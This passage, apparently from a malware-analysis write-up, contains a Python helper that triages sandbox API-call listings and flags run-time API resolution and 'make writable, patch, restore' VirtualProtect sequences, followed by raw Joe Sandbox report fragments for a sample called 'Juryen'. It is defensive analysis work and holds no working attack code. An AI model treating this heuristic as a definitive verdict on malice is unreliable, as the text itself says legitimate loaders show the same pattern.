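

def _arg(token: str) -> Any:
    """'?' = value not recovered by the sandbox -> None; hex -> int; anything else stays text."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # string argument such as "Arial"


def parse_call(line: str) -> Optional[Dict[str, Any]]:
    """Parse a single API line; returns None for lines that are not API calls."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [_arg(t) for t in raw.split(",")] if raw else [],
        "ref": int(m.group("ref"), 16),
        "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def decode_protect(call: Dict[str, Any]) -> Optional[str]:
    """Name the flNewProtect argument (3rd parameter) of a VirtualProtect call, if it was recovered."""
    if call["api"] != "VirtualProtect" or len(call["args"]) < 3 or call["args"][2] is None:
        return None
    value = call["args"][2]
    return PAGE_PROTECT.get(value & 0xFF, f"0x{value:X}")


def summarize(lines: List[str]) -> Dict[str, Any]:
    """Triage one function's API list: run-time API resolution and protection flips."""
    calls = [c for c in (parse_call(l) for l in lines) if c]
    protects = [c for c in calls if c["api"] == "VirtualProtect"]
    flips = [(c["ref"], c["args"][1] if len(c["args"]) > 1 else None, decode_protect(c)) for c in protects]
    # Heuristic (this example's assumption): a VirtualProtect that sets a writable
    # protection followed by another VirtualProtect over the same size is read as
    # "make writable, patch, restore old protection" (the restore value is the
    # lpflOldProtect output of the first call, which the sandbox shows as '?').
    write_then_restore = False
    for i, c in enumerate(protects):
        prot = c["args"][2] if len(c["args"]) > 2 else None
        if prot is None or (prot & 0xFF) not in WRITABLE:
            continue
        size = c["args"][1] if len(c["args"]) > 1 else None
        if any(len(d["args"]) > 1 and d["args"][1] == size for d in protects[i + 1:]):
            write_then_restore = True
            break
    return {
        "calls": len(calls),
        "dynamic_resolution": any(c["api"] in RESOLVERS for c in calls),
        "protect_flips": flips,
        "write_then_restore": write_then_restore,
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LINES))
```

Run over the listing above, the summary reports `dynamic_resolution` and `write_then_restore` as true and decodes the first VirtualProtect as PAGE_READWRITE over 0x78 bytes; the second call's new protection is unrecovered ('?'), which is consistent with restoring a value read back at run time. The heuristic is a triage aid for reading these listings, not a verdict: a legitimate loader can show the same sequence, so confirm against the dump (what lies at the patched address and which name is resolved at 0044B41C).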
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                    APIs
                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                    • String ID: Arial
                                                                    • API String ID: 3853255127-493054409
                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99